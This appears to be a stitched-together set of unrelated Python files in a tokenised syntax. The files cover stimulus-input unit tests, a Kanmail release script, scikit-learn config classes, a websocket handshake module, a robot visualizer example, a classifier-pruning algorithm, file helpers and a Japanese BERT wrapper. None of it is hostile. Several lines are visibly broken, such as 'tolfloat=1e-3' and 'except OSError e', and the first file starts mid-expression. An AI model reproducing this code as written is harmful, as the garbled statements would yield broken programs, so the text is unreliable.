np.array(2<times>[self.AMPLITUDE]))<block_end><def_stmt>test_start_end_input self<block_start>sq=SquareInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(sq[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(sq[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>sq=SquareInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>params=sq.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "start":STIM_START "end":STIM_END "dc_bias":<false> } )<block_end><def_stmt>test_set_params self<block_start>sq=SquareInput(start=STIM_START end=STIM_END amplitude=self.AMPLITUDE frequency=self.FREQUENCY n=2 seed=42 )<line_sep>UPDATE={"amplitude":43.0 "seed":12 "start":"None"}<line_sep>sq.update_params(UPDATE)<line_sep>params=sq.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "frequency":self.FREQUENCY "amplitude":self.AMPLITUDE "end":STIM_END "dc_bias":<false> **UPDATE "start":<none> } )<block_end><block_end><class_stmt>TestLinearRampInput(unittest.TestCase)<block_start>INP_MAX=5.0<line_sep>RAMP_LENGTH=2.0<def_stmt>test_generate_input self<block_start>ramp=LinearRampInput(inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ramp np.ndarray))<line_sep>self.assertTupleEqual(ramp.shape SHAPE)<line_sep>np.testing.assert_equal(np.max(ramp axis=1) np.array(2<times>[self.INP_MAX]))<line_sep>np.testing.assert_equal(np.min(ramp axis=1) np.array(2<times>[0.25]))<block_end><def_stmt>test_start_end_input self<block_start>ramp=LinearRampInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(ramp[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(ramp[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>ramp=LinearRampInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 )<line_sep>params=ramp.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "ramp_length":self.RAMP_LENGTH "start":STIM_START "end":STIM_END } )<block_end><def_stmt>test_set_params self<block_start>ramp=LinearRampInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX ramp_length=self.RAMP_LENGTH n=2 seed=42 )<line_sep>UPDATE={"inp_max":41.0 "seed":12}<line_sep>ramp.update_params(UPDATE)<line_sep>params=ramp.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "ramp_length":self.RAMP_LENGTH "start":STIM_START "end":STIM_END **UPDATE } )<block_end><block_end><class_stmt>TestExponentialInput(unittest.TestCase)<block_start>INP_MAX=5.0<line_sep>EXP_COEF=30.0<line_sep>EXP_TYPE="rise"<def_stmt>test_generate_input_rise self<block_start>exp_rise=ExponentialInput(inp_max=self.INP_MAX exp_type="rise" n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(exp_rise np.ndarray))<line_sep>self.assertTupleEqual(exp_rise.shape SHAPE)<line_sep>np.testing.assert_almost_equal(np.max(exp_rise axis=1) np.array(2<times>[self.INP_MAX]))<line_sep>self.assertTrue(np.all(np.diff(exp_rise)<ge>0))<block_end><def_stmt>test_generate_input_decay self<block_start>exp_decay=ExponentialInput(inp_max=self.INP_MAX exp_type="decay" n=2 seed=42 ).generate_input(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(exp_decay np.ndarray))<line_sep>self.assertTupleEqual(exp_decay.shape SHAPE)<line_sep>self.assertTrue(np.all(np.diff(exp_decay)<le>0))<block_end><def_stmt>test_start_end_input self<block_start>exp_rise=ExponentialInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX n=2 seed=42 ).as_array(duration=DURATION dt=DT)<line_sep>np.testing.assert_allclose(exp_rise[: :int(STIM_START/DT)] 0.0)<line_sep>np.testing.assert_allclose(exp_rise[: int(STIM_END/DT):] 0.0)<block_end><def_stmt>test_get_params self<block_start>exp_rise=ExponentialInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX n=2 seed=42 )<line_sep>params=exp_rise.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "exp_coef":self.EXP_COEF "exp_type":self.EXP_TYPE "start":STIM_START "end":STIM_END } )<block_end><def_stmt>test_set_params self<block_start>exp_rise=ExponentialInput(start=STIM_START end=STIM_END inp_max=self.INP_MAX n=2 seed=42 )<line_sep>UPDATE={"inp_max":41.0 "seed":12}<line_sep>exp_rise.update_params(UPDATE)<line_sep>params=exp_rise.get_params()<line_sep>params.pop("type")<line_sep>self.assertDictEqual(params {"n":2 "seed":42 "inp_max":self.INP_MAX "exp_coef":self.EXP_COEF "exp_type":self.EXP_TYPE "start":STIM_START "end":STIM_END **UPDATE } )<block_end><block_end><class_stmt>TestSummedStimulus(unittest.TestCase)<block_start><def_stmt>_create_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=0.1 sigma=0.02 tau=2.0 n=2)<line_sep>sq=SquareInput(amplitude=0.2 frequency=50 n=2 start=5)<line_sep>sin=SinusoidalInput(amplitude=0.1 frequency=100 n=2 start=2)<line_sep>step=StepInput(step_size=0.5 n=2 start=7)<line_sep><return>sq+(sin+step+ou)<block_end><def_stmt>test_init self<block_start>summed=self._create_input()<line_sep>self.assertEqual(len(summed) 4)<line_sep>self.assertTrue(isinstance(summed SummedStimulus))<line_sep>self.assertEqual(summed.n 2)<line_sep>self.assertEqual(len(summed.inputs) 4)<block_end><def_stmt>test_set_n self<block_start>summed=self._create_input()<line_sep>self.assertEqual(summed.n 2)<line_sep>ts=summed.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 2)<line_sep>summed.n=5<line_sep>self.assertEqual(summed.n 5)<line_sep>ts=summed.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 5)<block_end><def_stmt>test_generate_input self<block_start>summed=self._create_input()<line_sep>ts=summed.as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=summed.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><def_stmt>test_get_params self<block_start>summed=self._create_input()<line_sep>params=summed.get_params()<line_sep>self.assertTrue(isinstance(params dict))<line_sep>self.assertEqual(len(params) 1+len(summed.inputs))<for_stmt>i,process enumerate(summed)<block_start>self.assertDictEqual(process.get_params() params[f"input_{i}"])<block_end><block_end><def_stmt>test_update_params self<block_start>summed=self._create_input()<line_sep>UPDATE_DICT={f"input_{i}":{"n":3}<for>i range(len(summed))}<line_sep>summed.update_params(UPDATE_DICT)<line_sep>self.assertEqual(summed.n 3)<block_end><block_end><class_stmt>TestConcatenatedStimulus(unittest.TestCase)<block_start><def_stmt>_create_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=0.1 sigma=0.02 tau=2.0 n=2)<line_sep>sq=SquareInput(amplitude=0.2 frequency=20.0 n=2)<line_sep>sin=SinusoidalInput(amplitude=0.1 frequency=10.0 n=2)<line_sep>step=StepInput(step_size=0.5 n=2)<line_sep><return>ou&(sq&sin&step)<block_end><def_stmt>test_init self<block_start>conc=self._create_input()<line_sep>self.assertEqual(len(conc) 4)<line_sep>self.assertTrue(isinstance(conc ConcatenatedStimulus))<line_sep>self.assertEqual(conc.n 2)<line_sep>self.assertEqual(len(conc.inputs) 4)<block_end><def_stmt>test_set_n self<block_start>conc=self._create_input()<line_sep>self.assertEqual(conc.n 2)<line_sep>ts=conc.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 2)<line_sep>conc.n=5<line_sep>self.assertEqual(conc.n 5)<line_sep>ts=conc.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 5)<block_end><def_stmt>test_generate_input self<block_start>conc=self._create_input()<line_sep>ts=conc.as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=conc.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><def_stmt>test_get_params self<block_start>conc=self._create_input()<line_sep>params=conc.get_params()<line_sep>self.assertTrue(isinstance(params dict))<line_sep>self.assertEqual(len(params) 1+len(conc.inputs))<for_stmt>i,process enumerate(conc)<block_start>self.assertDictEqual(process.get_params() params[f"input_{i}"])<block_end><block_end><def_stmt>test_update_params self<block_start>conc=self._create_input()<line_sep>UPDATE_DICT={f"input_{i}":{"n":3}<for>i range(len(conc))}<line_sep>conc.update_params(UPDATE_DICT)<line_sep>self.assertEqual(conc.n 3)<block_end><block_end><class_stmt>TestBeastInput(unittest.TestCase)<block_start><def_stmt>_create_input self<block_start>ou=OrnsteinUhlenbeckProcess(mu=0.1 sigma=0.02 tau=2.0 n=2)<line_sep>sq=SquareInput(amplitude=0.2 frequency=20.0 n=2)<line_sep>sin=SinusoidalInput(amplitude=0.1 frequency=10.0 n=2)<line_sep>step=StepInput(step_size=0.5 n=2)<line_sep><return>(sq+sin)&(step+ou)<block_end><def_stmt>test_init self<block_start>beast=self._create_input()<line_sep>self.assertEqual(len(beast) 2)<line_sep>self.assertTrue(isinstance(beast ConcatenatedStimulus))<for_stmt>process beast<block_start>self.assertTrue(isinstance(process SummedStimulus))<block_end>self.assertEqual(beast.n 2)<block_end><def_stmt>test_set_n self<block_start>beast=self._create_input()<line_sep>self.assertEqual(beast.n 2)<line_sep>ts=beast.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 2)<line_sep>beast.n=5<line_sep>self.assertEqual(beast.n 5)<line_sep>ts=beast.as_array(duration=DURATION dt=DT)<line_sep>self.assertEqual(ts.shape[0] 5)<block_end><def_stmt>test_generate_input self<block_start>beast=self._create_input()<line_sep>ts=beast.as_array(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=beast.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><def_stmt>test_get_params self<block_start>beast=self._create_input()<line_sep>params=beast.get_params()<line_sep>self.assertTrue(isinstance(params dict))<line_sep>self.assertEqual(len(params) 1+len(beast.inputs))<for_stmt>i,process enumerate(beast)<block_start>self.assertDictEqual(process.get_params() params[f"input_{i}"])<block_end><block_end><block_end><class_stmt>TestRectifiedInput(unittest.TestCase)<block_start><def_stmt>test_init self<block_start>rect=RectifiedInput(0.2 n=2)<line_sep>self.assertTrue(isinstance(rect ConcatenatedStimulus))<line_sep>self.assertEqual(len(rect) 5)<line_sep>self.assertEqual(rect.n 2)<block_end><def_stmt>test_generate self<block_start>rect=RectifiedInput(0.2 n=2)<line_sep>ts=rect.as_array(DURATION DT)<line_sep>self.assertTrue(isinstance(ts np.ndarray))<line_sep>self.assertTupleEqual(ts.shape SHAPE)<line_sep>ts=rect.as_cubic_splines(duration=DURATION dt=DT)<line_sep>self.assertTrue(isinstance(ts CubicHermiteSpline))<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end> |
<import_from_stmt>os path<import_stmt>click<import_from_stmt>.settings NEW_BUILDS_DIRNAME<import_from_stmt>.util print_and_run read_version_data<def_stmt>_wait_for_build filename<block_start>click.echo('Build the client in another window, and return here afterwards')<line_sep>version=read_version_data()['version']<line_sep>filename=path.join(NEW_BUILDS_DIRNAME filename.format(version=version))<while_stmt><true><block_start><if_stmt>click.confirm('Has the build completed? ')<block_start><if_stmt>path.exists(filename)<block_start><return><block_end>click.echo(f'File {filename} not found, please try again.')<block_end><block_end><block_end>@click.command()<def_stmt>do_release <block_start>print_and_run(('python' '-m' 'make.clean'))<line_sep>print_and_run(('python' '-m' 'make' '--release'))<if_stmt>click.confirm('Build Docker container?' default=<true>)<block_start>print_and_run(('python' '-m' 'make' '--docker' '--release'))<block_end><if_stmt>click.confirm('Build MacOS client? ' default=<true>)<block_start>_wait_for_build('Kanmail-mac-{version}.tar.gz')<block_end><if_stmt>click.confirm('Build Windows client? ' default=<true>)<block_start>_wait_for_build('Kanmail-win-{version}.zip')<block_end><if_stmt>click.confirm('Build Linux client? ' default=<false>)<block_start>_wait_for_build('Kanmail-nix64-{version}.tar.gz')<block_end>print_and_run(('python' '-m' 'make' '--release' '--complete'))<block_end><if_stmt>__name__<eq>'__main__'<block_start>do_release()<block_end> |
"""各种模型的设置"""<import_from_stmt>typing Union Optional Dict<import_from_stmt>.base ConfigBase<class_stmt>MLModelConfig(ConfigBase)<block_start><pass><block_end><class_stmt>LogisticRegressionConfig(MLModelConfig)<block_start>"""参考:https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html"""<line_sep># penalty{‘l1’, ‘l2’, ‘elasticnet’, ‘none’} Used to specify the norm used in the penalization.
penalty:str="l2"<line_sep># Dual or primal formulation. Dual formulation is only implemented
# for l2 penalty with liblinear solver. Prefer dual=False when n_samples > n_features.
dual:bool=<false><line_sep># Tolerance for stopping criteria.
tol:float=1e-4<line_sep># Inverse of regularization strength
# must be a positive float. Like in support vector machines, smaller values specify stronger regularization.
C:float=1.0<line_sep># Specifies if a constant(a.k.a. bias or intercept) should be added to the decision function.
fit_intercept:bool=<true><line_sep># Useful only when the solver ‘liblinear’ is used and self.fit_intercept is set to True.
intercept_scaling:float=1<line_sep># dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
class_weight:Union[str <none> Dict[str float]]="balanced"<line_sep># {‘newton-cg’, ‘lbfgs’, ‘liblinear’, ‘sag’, ‘saga’}
# Algorithm to use in the optimization problem.
# For small datasets, ‘liblinear’ is a good choice, whereas ‘sag’ and ‘saga’ are faster for large ones.
solver:str='sag'<line_sep># Maximum number of iterations taken for the solvers to converge.
max_iter:int=1000<line_sep># multi_class{‘auto’, ‘ovr’, ‘multinomial’} =’auto’
multi_class:str='ovr'<line_sep># For the liblinear and lbfgs solvers set verbose to any positive number for verbosity.
verbose:int=0<line_sep># The seed of the pseudo random number generator to use when shuffling the data.
# If int, random_state is the seed used by the random number generator
# If None, the random number generator is the RandomState instance used
# by np.random. Used when solver == ‘sag’ or ‘liblinear’.
random_state:int=<none><line_sep># Number of CPU cores used when parallelizing over classes if multi_class =’ovr’”. T
n_jobs:int=<none><line_sep># The Elastic-Net mixing parameter, with 0 <= l1_ratio <= 1.
l1_ratio:Optional[float]=<none><block_end><class_stmt>LinearSVMConfig(MLModelConfig)# dict or ‘balanced’ or None, default="balanced"
# Weights associated with classes in the form {class_label: weight}.
# If not given, all classes are supposed to have weight one.
# The “balanced” mode uses the values of y to automatically adjust weights
# inversely proportional to class frequencies in the input data as n_samples / (n_classes * np.bincount(y)).
<block_start>class_weight:Union[str <none> Dict[str float]]="balanced"<line_sep># The penalty (aka regularization term) to be used. Defaults to ‘l2’ which is the standard regularizer for linear
# SVM models. ‘l1’ and ‘elasticnet’ might bring sparsity to the model (feature selection) not achievable with ‘l2’.
penalty:str='l2'<line_sep># Constant that multiplies the regularization term. Defaults to 0.0001.
# Also used to compute learning_rate when set to ‘optimal’.
alpha:float=0.0001<line_sep># The Elastic Net mixing parameter, with 0 <= l1_ratio <= 1. l1_ratio = 0 corresponds to
# L2 penalty, l1_ratio = 1 to L1. Defaults to 0.15.
l1_ratio:float=0.15<line_sep># Whether the intercept should be estimated or not. If False, the data is assumed to be already centered.
fit_intercept:bool=<true><line_sep># The maximum number of passes over the training data(aka epochs).
# It only impacts the behavior in the fit method, and not the partial_fit method.
max_iter:int=1000<line_sep># The stopping criterion. If it is not None, the iterations will stop when(loss > best_loss - tol)
# for n_iter_no_change consecutive epochs.
tolfloat=1e-3<line_sep># Whether or not the training data should be shuffled after each epoch.
shufflebool=<true><line_sep># The verbosity level.
verboseint=0<line_sep># The number of CPUs to use to do the OVA(One Versus All, for multi-class problems) computation. None means 1
# unless in a joblib.parallel_backend context. -1 means using all processors. See Glossary for more details.
n_jobs:int=<none><line_sep># The seed of the pseudo random number generator to use when shuffling the data. If int, random_state is the
# seed used by the random number generator
# If RandomState instance, random_state is the random number generator
# If None, the random number generator is the RandomState instance used by np.random.
random_state:Optional[int]=<none><line_sep># Number of iterations with no improvement to wait before early stopping.
n_iter_no_change:int=5<block_end> |
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket opening handshake processor. This class try to apply available
opening handshake processors for each protocol version until a connection is
successfully established.
"""<import_from_future_stmt> absolute_import<import_stmt>logging<import_from_stmt>mod_pywebsocket common<import_from_stmt>mod_pywebsocket.handshake hybi<line_sep># Export AbortedByUserException, HandshakeException, and VersionException
# symbol from this module.
<import_from_stmt>mod_pywebsocket.handshake._base AbortedByUserException<import_from_stmt>mod_pywebsocket.handshake._base HandshakeException<import_from_stmt>mod_pywebsocket.handshake._base VersionException<line_sep>_LOGGER=logging.getLogger(__name__)<def_stmt>do_handshake request dispatcher<block_start>"""Performs WebSocket handshake.
Args:
request: mod_python request.
dispatcher: Dispatcher (dispatch.Dispatcher).
Handshaker will add attributes such as ws_resource in performing
handshake.
"""<line_sep>_LOGGER.debug('Client\'s opening handshake resource: %r' request.uri)<line_sep># To print mimetools.Message as escaped one-line string, we converts
# headers_in to dict object. Without conversion, if we use %r, it just
# prints the type and address, and if we use %s, it prints the original
# header string as multiple lines.
#
# Both mimetools.Message and MpTable_Type of mod_python can be
# converted to dict.
#
# mimetools.Message.__str__ returns the original header string.
# dict(mimetools.Message object) returns the map from header names to
# header values. While MpTable_Type doesn't have such __str__ but just
# __repr__ which formats itself as well as dictionary object.
_LOGGER.debug('Client\'s opening handshake headers: %r' dict(request.headers_in))<line_sep>handshakers=[]<line_sep>handshakers.append(('RFC 6455' hybi.Handshaker(request dispatcher)))<for_stmt>name,handshaker handshakers<block_start>_LOGGER.debug('Trying protocol version %s' name)<try_stmt><block_start>handshaker.do_handshake()<line_sep>_LOGGER.info('Established (%s protocol)' name)<line_sep><return><block_end><except_stmt>HandshakeException<as>e<block_start>_LOGGER.debug('Failed to complete opening handshake as %s protocol: %r' name e)<if_stmt>e.status<block_start><raise>e<block_end><block_end><except_stmt>AbortedByUserException<as>e<block_start><raise><block_end><except_stmt>VersionException<as>e<block_start><raise><block_end><block_end># TODO(toyoshim): Add a test to cover the case all handshakers fail.
<raise>HandshakeException('Failed to complete opening handshake for all available protocols' status=common.HTTP_STATUS_BAD_REQUEST)<block_end># vi:sts=4 sw=4 et
|
# NOTE: this example needs gepetto-gui to be installed
# usage: launch gepetto-gui and then run this test
<import_stmt>pinocchio<as>pin<import_stmt>numpy<as>np<import_stmt>sys<import_stmt>os<import_from_stmt>os.path dirname join abspath<import_from_stmt>pinocchio.visualize GepettoVisualizer<line_sep># Load the URDF model.
# Conversion with str seems to be necessary when executing this file with ipython
pinocchio_model_dir=join(dirname(dirname(str(abspath(__file__)))) "models")<line_sep>model_path=join(pinocchio_model_dir "example-robot-data/robots")<line_sep>mesh_dir=pinocchio_model_dir<line_sep>urdf_filename="talos_reduced.urdf"<line_sep>urdf_model_path=join(join(model_path "talos_data/robots") urdf_filename)<line_sep>model,collision_model,visual_model=pin.buildModelsFromUrdf(urdf_model_path mesh_dir pin.JointModelFreeFlyer())<line_sep>viz=GepettoVisualizer(model collision_model visual_model)<line_sep># Initialize the viewer.
<try_stmt><block_start>viz.initViewer()<block_end><except_stmt>ImportError<as>err<block_start>print("Error while initializing the viewer. It seems you should install gepetto-viewer")<line_sep>print(err)<line_sep>sys.exit(0)<block_end><try_stmt><block_start>viz.loadViewerModel("pinocchio")<block_end><except_stmt>AttributeError<as>err<block_start>print("Error while loading the viewer model. It seems you should start gepetto-viewer")<line_sep>print(err)<line_sep>sys.exit(0)<block_end># Display a robot configuration.
q0=pin.neutral(model)<line_sep>viz.display(q0)<line_sep># Display another robot.
viz2=GepettoVisualizer(model collision_model visual_model)<line_sep>viz2.initViewer(viz.viewer)<line_sep>viz2.loadViewerModel(rootNodeName="pinocchio2")<line_sep>q=q0.copy()<line_sep>q[1]=1.0<line_sep>viz2.display(q)<line_sep> |
"""Implementation of the Dynamic Frienemy Pruning (DFP) algorithm for online
pruning of base classifiers.
References
----------
<NAME>., <NAME>. and <NAME>., Online Pruning
of Base Classifiers for Dynamic Ensemble Selection,
Pattern Recognition, vol. 72, December 2017, pp 44-58.
Cruz, <NAME>, <NAME>, <NAME>, and <NAME>.
"FIRE-DES++: Enhanced online pruning of base classifiers for dynamic ensemble
selection." Pattern Recognition 85 (2019): 149-160.
"""<line_sep># coding=utf-8
# Author: <NAME> <<EMAIL>>
#
# License: BSD 3 clause
<import_stmt>numpy<as>np<import_from_stmt>sklearn.neighbors KNeighborsClassifier<def_stmt>frienemy_pruning X_query X_dsel y_dsel ensemble k<block_start>"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classify at least one sample for each different class in the region.
Parameters
----------
X_query : array-like of shape (n_samples, n_features)
Test set.
X_dsel : array-like of shape (n_samples, n_features)
Dynamic selection set.
y_dsel : array-like of shape (n_samples,)
The target values (Dynamic selection set).
ensemble : list of shape = [n_classifiers]
The ensemble of classifiers to be pruned.
k : int
Number of neighbors used to compute the regions of competence.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""<line_sep>predictions=np.zeros((X_dsel.shape[0] len(ensemble)) dtype=np.intp)<for_stmt>index,clf enumerate(ensemble)<block_start>predictions[: index]=clf.predict(X_dsel)<block_end>hit_miss=predictions<eq>y_dsel[: np.newaxis]<line_sep>competence_region=KNeighborsClassifier(n_neighbors=k).fit(X_dsel y_dsel)<line_sep>neighbors=competence_region.kneighbors(X_query return_distance=<false>)<line_sep><return>frienemy_pruning_preprocessed(neighbors y_dsel hit_miss)<block_end><def_stmt>frienemy_pruning_preprocessed neighbors y_val hit_miss<block_start>"""Implements the Online Pruning method (frienemy) which prunes base
classifiers that do not cross the region of competence of a given instance.
A classifier crosses the region of competence if it correctly
classify at least one sample for each different class in the region.
Notes
-----
This implementation assumes the regions of competence of each query example
(neighbors) and the predictions for the dynamic selection data (hit_miss)
were already pre-computed.
Parameters
----------
neighbors : array-like of shape (n_samples, n_neighbors)
Indices of the k nearest neighbors.
y_val : array-like of shape (n_samples,)
The target values (class labels).
hit_miss : array-like of shape (n_samples, n_classifiers)
Matrix containing 1 when the base classifier made the correct
prediction, 0 otherwise.
Returns
-------
DFP_mask : array-like of shape = [n_samples, n_classifiers]
Mask containing 1 for the selected base classifier and 0
otherwise.
"""<if_stmt>neighbors.ndim<l>2<block_start>neighbors=neighbors.reshape(1 -1)<block_end>n_samples=neighbors.shape[0]<line_sep>n_classifiers=hit_miss.shape[1]<line_sep>dfp_mask=np.zeros((n_samples n_classifiers))<line_sep># TODO: vectorize this code?
<for_stmt>sample_idx range(n_samples)<block_start>curr_neighbors=neighbors[sample_idx]<line_sep>neighbors_y=y_val[curr_neighbors]<if_stmt>len(set(neighbors_y))<g>1# Indecision region. Check if the base classifier predict the
# correct label for a sample belonging to each class.
<block_start><for_stmt>clf_index range(n_classifiers)<block_start>[mask]=np.where(hit_miss[curr_neighbors clf_index])<if_stmt>len(set(neighbors_y[mask]))<g>1<block_start>dfp_mask[sample_idx clf_index]=1.0<block_end><block_end><block_end><else_stmt># Safe region.
<block_start>dfp_mask[sample_idx :]=1.0<block_end><block_end># rows that all classifiers were pruned are set to 1.0
dfp_mask[np.all(dfp_mask<eq>0 axis=1)]=1.0<line_sep><return>dfp_mask<block_end> |
"""Miscellaneous file operations"""<import_stmt>os os.path errno<def_stmt>ensureDir dir<block_start>"""Ensure that a directory exists, creating it (and parents) if needed."""<try_stmt><block_start>os.makedirs(dir)<block_end><except_stmt>OSError e<block_start><if_stmt>e.errno<ne>errno.EEXIST<block_start><raise>e<block_end><block_end><block_end><def_stmt>ensureFileDir fname<block_start>"""Ensure that the directory for a file exists, creating it (and parents) if needed.
Returns the directory path"""<line_sep>dir=os.path.dirname(fname)<if_stmt>len(dir)<g>0<block_start>ensureDir(dir)<line_sep><return>dir<block_end><else_stmt><block_start><return>"."<block_end><block_end><def_stmt>prLine fh *objs<block_start>"write each str(obj) followed by a newline"<for_stmt>o objs<block_start>fh.write(str(o))<block_end>fh.write("\n")<block_end><def_stmt>prStrs fh *objs<block_start>"write each str(obj), with no newline"<for_stmt>o objs<block_start>fh.write(str(o))<block_end><block_end><def_stmt>prRow fh row<block_start>"""Print a row (list or tupe) to a tab file.
Does string conversion on each columns"""<line_sep>first=<true><for_stmt>col row<block_start><if_stmt><not>first<block_start>fh.write("\t")<block_end>fh.write(str(col))<line_sep>first=<false><block_end>fh.write("\n")<block_end><def_stmt>prRowv fh *objs<block_start>"""Print a row from each argument to a tab file.
Does string conversion on each columns"""<line_sep>first=<true><for_stmt>col objs<block_start><if_stmt><not>first<block_start>fh.write("\t")<block_end>fh.write(str(col))<line_sep>first=<false><block_end>fh.write("\n")<block_end> |
# Copyright (c) Facebook, Inc., its affiliates and Kakao Brain. All Rights Reserved
<import_from_stmt>typing Dict Union<import_stmt>torch<import_from_stmt>fairseq.models.roberta RobertaModel<import_from_stmt>fairseq.models.roberta.hub_interface RobertaHubInterface<import_from_stmt>transformers BertJapaneseTokenizer<import_from_stmt>pororo.models.brainbert.utils softmax<import_from_stmt>pororo.tasks.utils.download_utils download_or_load<class_stmt>JabertaModel(RobertaModel)<block_start>@classmethod<def_stmt>load_model cls model_name:str lang:str **kwargs<block_start>"""
Load pre-trained model as RobertaHubInterface.
:param model_name: model name from available_models
:return: pre-trained model
"""<import_from_stmt>fairseq hub_utils<line_sep>ckpt_dir=download_or_load(model_name lang)<line_sep>x=hub_utils.from_pretrained(ckpt_dir "model.pt" load_checkpoint_heads=<true> **kwargs )<line_sep><return>JabertaHubInterface(x["args"] x["task"] x["models"][0])<block_end><block_end><class_stmt>JabertaHubInterface(RobertaHubInterface)<block_start><def_stmt>__init__ self args task model<block_start>super().__init__(args task model)<try_stmt><block_start><import_stmt>ipadic# noqa
<block_end><except_stmt>ImportError<block_start><raise>ImportError("Please install ipadic with: `pip install ipadic`")<block_end><try_stmt><block_start><import_stmt>fugashi# noqa
<block_end><except_stmt>ImportError<block_start><raise>ImportError("Please install fugashi with: `pip install fugashi`")<block_end>self.bpe=BertJapaneseTokenizer.from_pretrained("cl-tohoku/bert-base-japanese-whole-word-masking")<block_end><def_stmt>tokenize self sentence:str add_special_tokens:bool=<false><block_start>result=" ".join(self.bpe.tokenize(sentence)[:510])<if_stmt>add_special_tokens<block_start>result=f"<s> {result} </s>"<block_end><return>result<block_end><def_stmt>encode self sentence:str *addl_sentences add_special_tokens:bool=<true> no_separator:bool=<false> return_bpe:bool=<false> <arrow>torch.LongTensor<block_start>bpe_sentence=self.tokenize(sentence add_special_tokens=add_special_tokens )<for_stmt>s addl_sentences<block_start>bpe_sentence<augadd>" </s>"<if><not>no_separator<and>add_special_tokens<else>""<line_sep>bpe_sentence<augadd>(" "+self.tokenize(s add_special_tokens=<false>)+" </s>"<if>add_special_tokens<else>"")<block_end>tokens=self.task.source_dictionary.encode_line(bpe_sentence append_eos=<false> add_if_not_exist=<false> )<if_stmt>return_bpe<block_start><return>tokens.long() 